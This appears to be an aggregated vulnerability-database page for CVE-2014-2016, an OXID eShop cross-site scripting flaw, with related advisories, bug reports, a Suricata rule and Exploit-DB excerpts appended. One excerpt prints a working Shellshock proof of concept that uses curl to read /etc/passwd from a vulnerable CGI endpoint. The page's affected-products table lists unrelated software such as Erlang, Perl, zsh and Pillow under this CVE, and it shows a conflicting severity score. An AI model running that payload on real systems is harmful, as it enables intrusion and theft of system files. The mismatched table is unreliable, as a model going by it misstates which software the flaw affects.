CVE-2014-2016
Published: 2014-03-25
Priority P420, medium
CVSS 2.0: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
EXPLOIT
EPSS: 1.47% (70.6th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in OXID eShop Professional and Community Edition 4.6.8 and earlier, 4.7.x before 4.7.11, and 4.8.x before 4.8.4, and Enterprise Edition 4.6.8 and earlier, 5.0.x before 5.0.11 and 5.1.x before 5.1.4 allow remote attackers to inject arbitrary web script or HTML via the searchtag parameter to the getTag function in (1) application/controllers/details.php or (2) application/controllers/tag.php.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| erlang | erlang_otp | >= 0 < 1:16.b.3-dfsg-1ubuntu2.2 | 1:16.b.3-dfsg-1ubuntu2.2 |
| erlang | erlang_otp | >= 0 < 1:18.3-dfsg-1ubuntu3.1 | 1:18.3-dfsg-1ubuntu3.1 |
| node-bsdiff-android_project | node-bsdiff-android | 0 – 0.1.5 | — |
| oxid-esales | eshop | <= 4.6.8 | — |
| oxid-esales | eshop | >= 4.7.0 < 4.7.11 | 4.7.11 |
| oxid-esales | eshop | >= 4.8.0 < 4.8.4 | 4.8.4 |
| oxid-esales | eshop | >= 5.0.0 < 5.0.11 | 5.0.11 |
| oxid-esales | eshop | >= 5.1.0 < 5.1.4 | 5.1.4 |
| perl | perl | >= 0 < 5.18.2-2ubuntu1.1 | 5.18.2-2ubuntu1.1 |
| php5 | php5 | >= 0 < 5.5.9+dfsg-1ubuntu4.16 | 5.5.9+dfsg-1ubuntu4.16 |
| python | pillow | >= 0 < 2.3.0-1ubuntu3.4 | 2.3.0-1ubuntu3.4 |
| python | pillow | >= 0 < 3.1.2-0ubuntu1.1 | 3.1.2-0ubuntu1.1 |
| zsh | zsh | >= 0 < 5.0.2-3ubuntu6.1 | 5.0.2-3ubuntu6.1 |
| zsh | zsh | >= 0 < 5.1.1-1ubuntu2.1 | 5.1.1-1ubuntu2.1 |
CVSS provenance
nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
osv · 7.8 HIGH
VulDB
Oxid-esales eShop up to 5.1.3 getTag searchtag cross site scripting (EDB-32375 / SA57438)
vuldb·2026-05-09·CVSS 4.3
CVE-2014-2016 [MEDIUM] Oxid-esales eShop up to 5.1.3 getTag searchtag cross site scripting (EDB-32375 / SA57438)
A vulnerability classified as problematic was found in Oxid-esales eShop. Affected is the function getTag. The manipulation of the argument searchtag results in cross site scripting.
This vulnerability is known as CVE-2014-2016. It is possible to launch the attack remotely. Furthermore, an exploit is available.
GHSA
GHSA-vq4f-r8pc-6pf3: Multiple cross-site scripting (XSS) vulnerabilities in OXID eShop Professional and Community Edition 4
ghsa_unreviewed·2022-05-14
CVE-2014-2016 [MEDIUM] CWE-79 GHSA-vq4f-r8pc-6pf3: Multiple cross-site scripting (XSS) vulnerabilities in OXID eShop Professional and Community Edition 4
Multiple cross-site scripting (XSS) vulnerabilities in OXID eShop Professional and Community Edition 4.6.8 and earlier, 4.7.x before 4.7.11, and 4.8.x before 4.8.4, and Enterprise Edition 4.6.8 and earlier, 5.0.x before 5.0.11 and 5.1.x before 5.1.4 allow remote attackers to inject arbitrary web script or HTML via the searchtag parameter to the getTag function in (1) application/controllers/details.php or (2) application/controllers/tag.php.
GHSA
Downloads Resources over HTTP in node-bsdiff-android
ghsa·2018-09-18
CVE-2016-10641 [HIGH] CWE-269 Downloads Resources over HTTP in node-bsdiff-android
Affected versions of `node-bsdiff-android` insecurely download resources over HTTP.
In scenarios where an attacker has a privileged network position, they can modify or read such resources at will. While the exact severity of impact for a vulnerability like this is highly variable and depends on the behavior of the package itself, it ranges from being able to read sensitive information all the way up to and including remote code execution.
## Recommendation
No patch is currently available for this vulnerability, and the package has not seen an update since 2014.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring th
OSV
zsh vulnerabilities
osv·2018-03-08·CVSS 7.8
CVE-2014-10070 zsh vulnerabilities
It was discovered that Zsh incorrectly handled certain environment variables.
An attacker could possibly use this issue to gain privileged access to the
system. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-10070)
It was discovered that Zsh incorrectly handled certain inputs.
An attacker could possibly use this to execute arbitrary code. This
issue only affected Ubuntu 14.04 LTS. (CVE-2014-10071)
It was discovered that Zsh incorrectly handled some symbolic links.
An attacker could possibly use this to execute arbitrary code. This issue
only affected Ubuntu 14.04 LTS. (CVE-2014-10072)
It was discovered that Zsh incorrectly handled certain errors. An attacker
could possibly use this issue to cause a denial of service. (CVE-2016-10714)
It was discovered that Zsh
OSV
erlang vulnerabilities
osv·2018-02-14·CVSS 7.5
CVE-2014-1693 erlang vulnerabilities
It was discovered that the Erlang FTP module incorrectly handled certain
CRLF sequences. A remote attacker could possibly use this issue to inject
arbitrary FTP commands. This issue only affected Ubuntu 14.04 LTS.
(CVE-2014-1693)
It was discovered that Erlang incorrectly checked CBC padding bytes. A
remote attacker could possibly use this issue to perform a padding oracle
attack and decrypt traffic. This issue only affected Ubuntu 14.04 LTS.
(CVE-2015-2774)
It was discovered that Erlang incorrectly handled certain regular
expressions. A remote attacker could possibly use this issue to cause
Erlang to crash, resulting in a denial of service, or execute arbitrary
code. This issue only affected Ubuntu 16.04 LTS. (CVE-2016-10253)
Hanno Böck, Juraj Somorovsky and Crai
OSV
pillow vulnerabilities
osv·2017-03-13·CVSS 5.0
CVE-2014-9601 pillow vulnerabilities
It was discovered that Pillow incorrectly handled certain compressed text
chunks in PNG images. A remote attacker could possibly use this issue to
cause Pillow to crash, resulting in a denial of service. This issue only
affected Ubuntu 14.04 LTS. (CVE-2014-9601)
Cris Neckar discovered that Pillow incorrectly handled certain malformed
images. A remote attacker could use this issue to cause Pillow to crash,
resulting in a denial of service, or possibly obtain sensitive information.
(CVE-2016-9189)
Cris Neckar discovered that Pillow incorrectly handled certain malformed
images. A remote attacker could use this issue to cause Pillow to crash,
resulting in a denial of service, or possibly execute arbitrary code.
(CVE-2016-9190)
OSV
php5 vulnerabilities
osv·2016-04-21·CVSS 4.3
CVE-2014-9767 php5 vulnerabilities
It was discovered that the PHP Zip extension incorrectly handled
directories when processing certain zip files. A remote attacker could
possibly use this issue to create arbitrary directories. (CVE-2014-9767)
It was discovered that the PHP Soap client incorrectly validated data
types. A remote attacker could use this issue to cause PHP to crash,
resulting in a denial of service, or possibly execute arbitrary code.
(CVE-2015-8835, CVE-2016-3185)
It was discovered that the PHP MySQL native driver incorrectly handled TLS
connections to MySQL databases. A machine-in-the-middle attacker could possibly
use this issue to downgrade and snoop on TLS connections. This
vulnerability is known as BACKRONYM. (CVE-2015-8838)
It was discovered that PHP incorrectly handled the imag
OSV
perl vulnerabilities
osv·2016-03-02·CVSS 7.5
CVE-2013-7422 perl vulnerabilities
It was discovered that Perl incorrectly handled certain regular expressions
with an invalid backreference. An attacker could use this issue to cause
Perl to crash, resulting in a denial of service, or possibly execute
arbitrary code. (CVE-2013-7422)
Markus Vervier discovered that Perl incorrectly handled nesting in the
Data::Dumper module. An attacker could use this issue to cause Perl to
consume memory and crash, resulting in a denial of service. (CVE-2014-4330)
Stephane Chazelas discovered that Perl incorrectly handled duplicate
environment variables. An attacker could possibly use this issue to bypass
the taint protection mechanism. (CVE-2016-2381)
Suricata
ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1
suricata·2016-09-01·CVSS 8.8
CVE-2014-6332 [HIGH] ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1"; flow:established,to_client; file.data; content:"|26 63 68 72 77 28 32 31 37 36 29 26 63 68 72 77 28 30 31 29 26|"; nocase; content:"|26 63 68 72 77 28 33 32 37 36 37 29|"; nocase; content:"|73 65 74 6e 6f 74 73 61 66 65 6d 6f 64 65 28 29|"; nocase; content:"|72 75 6e 73 68 65 6c 6c 63 6f 64 65 28 29|"; nocase; reference:cve,2014-6332; classtype:trojan-activity; sid:2023145; rev:3; metadata:affected_product Internet_Explorer, attack_target Client_Endpoint, created_at 2016_09_01, cve CVE_2014_6332, deployment Perimeter, malware_family IEiExploit, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, upd
Exploit-DB
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)
exploitdb·2016-06-06
CVE-2014-6278 Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)
---
# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: [email protected]
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux
VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi
POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt
localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.
Exploit-DB
HP Data Protector A.09.00 - Arbitrary Command Execution
exploitdb·2016-05-26·CVSS 9.8
CVE-2016-2004 [CRITICAL] HP Data Protector A.09.00 - Arbitrary Command Execution
---
#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
# This proof of concept demonstrates that enabling encrypted control communication on
# Data Protector agents does not provide any additional security.
# As it provides no authentication it is not a viable workaround to prevent the
# exploitation of well known Data Protector issues such as cve-2014-2623
#
# This exploit establishes an unauthenticated encrypted communication channel to
# a Data Protector Agent and
Exploit-DB
OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities
exploitdb·2014-03-20·CVSS 4.3
CVE-2014-2017 [MEDIUM] OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities
---
# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities
# Google Dork: -
# Date: 12/2013
# Exploit Author: //sToRm
# Author mail: [email protected]
# Vendor Homepage: http://www.oxid-esales.com
# Software Link: -
# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4
# Tested on: Multiple platforms
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)
###########################################################################################################
# XSS vulnerability #######################################################################################
Under certain circumstances, an attacker can trick a user to enter a specially crafted
URI or click on
Bugzilla
CVE-2014-9911 icu: stack-based buffer overflow in uloc_getDisplayName
bugzilla·2016-10-11·CVSS 9.8
CVE-2014-9911 [CRITICAL] CVE-2014-9911 icu: stack-based buffer overflow in uloc_getDisplayName
A locale string of more than 255 characters passed to uloc_getDisplayName() could overflow a buffer on the stack, leading to a crash or, potentially, code execution.
Upstream patch:
http://bugs.icu-project.org/trac/changeset/35699
Upstream issue (private as at 2016-10-11):
http://bugs.icu-project.org/trac/ticket/10891
Discussion:
PHP bug (already fixed in bug 1065838):
https://bugs.php.net/bug.php?id=67397
Related ICU bug:
http://bugs.icu-project.org/trac/ticket/11936
---
Created mingw-icu tracking bugs for this issue:
Affects: fedora-all [bug 1397625]
Affects: epel-7 [bug 1397626]
---
The affected function has only one buffer on the stack, and it is overflowed at the end by copying a null-terminated string w
Bugzilla
CVE-2012-6703 kernel: Integer overflow in compress_core
bugzilla·2016-06-29·CVSS 7.8
CVE-2012-6703 [HIGH] CVE-2012-6703 kernel: Integer overflow in compress_core
An integer overflow was found in snd_compr_allocate_buffer() that could result in allocating a smaller buffer than expected.
Upstream patch:
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b35cc8225845112a616e3a2266d2fde5ab13d3ab
The patch was incomplete and introduced another issue known as CVE-2014-9904.
CVE assignment:
http://seclists.org/oss-sec/2016/q2/616
Bugzilla
CVE-2014-9832 ImageMagick: heap overflow in pcx file
bugzilla·2016-06-07·CVSS 7.8
CVE-2014-9832 [HIGH] CVE-2014-9832 ImageMagick: heap overflow in pcx file
Fix heap overflow in pcx file.
CVE assignment:
http://seclists.org/oss-sec/2016/q2/459
Upstream patch:
https://anonscm.debian.org/cgit/collab-maint/imagemagick.git/commit/?h=debian-patches/6.8.9.9-4-for-upstream&id=c264f9c466f22736c9fd9f8a7051f6b71ecb2c0d
Bugzilla
CVE-2014-9830 ImageMagick: handling of corrupted sun file
bugzilla·2016-06-07·CVSS 8.8
CVE-2014-9830 [HIGH] CVE-2014-9830 ImageMagick: handling of corrupted sun file
Fix handling of corrupted sun file.
CVE assignment:
http://seclists.org/oss-sec/2016/q2/459
Upstream patch:
https://anonscm.debian.org/cgit/collab-maint/imagemagick.git/commit/?h=debian-patches/6.8.9.9-4-for-upstream&id=b68b78e2625122d9f6b6d88ba4df7e85b47b556f
Bugzilla
CVE-2014-9845 ImageMagick: crash due to corrupted dib file
bugzilla·2016-06-07·CVSS 5.5
CVE-2014-9845 [MEDIUM] CVE-2014-9845 ImageMagick: crash due to corrupted dib file
Fix crash due to corrupted dib file.
CVE assignment:
http://seclists.org/oss-sec/2016/q2/459
Upstream patch:
https://anonscm.debian.org/cgit/collab-maint/imagemagick.git/commit/?h=debian-patches/6.8.9.9-4-for-upstream&id=a7a7fd3ce95b7b8efb0ce1ce40f43dbbd20d8e03
Bugzilla
CVE-2014-9819 ImageMagick: heap overflow in palm files
bugzilla·2016-06-07·CVSS 7.8
CVE-2014-9819 [HIGH] CVE-2014-9819 ImageMagick: heap overflow in palm files
Avoid heap overflow in palm files.
CVE assignment:
http://seclists.org/oss-sec/2016/q2/459
Upstream patch:
https://anonscm.debian.org/cgit/collab-maint/imagemagick.git/commit/?h=debian-patches/6.8.9.9-4-for-upstream&id=0a89a1ccca6e7ee059b73f5cc924513383e8a330
Bugzilla
CVE-2014-7913 dhcpcd: Misinterpreted return value of snprintf function
bugzilla·2016-05-10·CVSS 6.8
CVE-2014-7913 [MEDIUM] CVE-2014-7913 dhcpcd: Misinterpreted return value of snprintf function
The print_option function in dhcp-common.c in dhcpcd through 6.9.1 misinterprets the return value of the snprintf function, which allows remote DHCP servers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted message.
Patch:
https://android.googlesource.com/platform/external/dhcpcd/+/73c09dd8067250734511d955d8f792b41c7213f0
Upstream release fixing the issue:
http://roy.marples.name/archives/dhcpcd-discuss/2016/1244.html
External references:
(none)
Discussion:
Created dhcpcd tracking bugs for this issue:
Affects: fedora-23 [bug 1334635]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially support
Bugzilla
CVE-2016-3947 squid: buffer overrun in Squid proxy pinger
bugzilla·2016-04-04·CVSS 6.4
CVE-2016-3947 [MEDIUM] CVE-2016-3947 squid: buffer overrun in Squid proxy pinger
A buffer overrun (on write(2)) has been found in Squid proxy 'pinger'
process that allows an attacker to craft ICMPv6 messages that will
either crash the child process (if the OS protects against over-write)
or alter heap contents allowing the attacker to bypass CVE-2014-7142
protection and leak arbitrary heap data into the Squid log files. The
pinger is setuid root (though it does drop those privileges prior to
this attack being possible).
Upstream fix:
http://www.squid-cache.org/Versions/v3/3.5/changesets/squid-3.5-14015.patch
External references:
http://www.squid-cache.org/Advisories/SQUID-2016_3.txt
References:
http://seclists.org/oss-sec/2016/q2/2
Discussion:
Created squid tracking bugs for this issue:
Affects: fedora
Talos
Vulnerability Spotlight - LibBPG Image Decoding Code Execution
blogs_talos·2017-01-23·CVSS 7.8
CVE-2016-8710 [HIGH] Vulnerability Spotlight - LibBPG Image Decoding Code Execution
Discovered by Cisco Talos
### Overview
Talos is disclosing TALOS-2016-0223 / CVE-2016-8710. An exploitable heap write out of bounds vulnerability exists in the decoding of BPG images in libbpg library. A crafted BPG image decoded by libbpg can cause an integer underflow vulnerability causing an out of bounds heap write leading to remote code execution. This vulnerability can be triggered via attempting to decode a crafted BPG image using libbpg.
### Details
BPG (Better Portable Graphics) is an image format created in 2014 based on the HEVC video compression standard. BPG has been praised for its ability to produce the same quality image as the well known JPEG format, but in a much smaller file size. Talos is disclosing the presence of a remote code execution vulnerability in the libbpg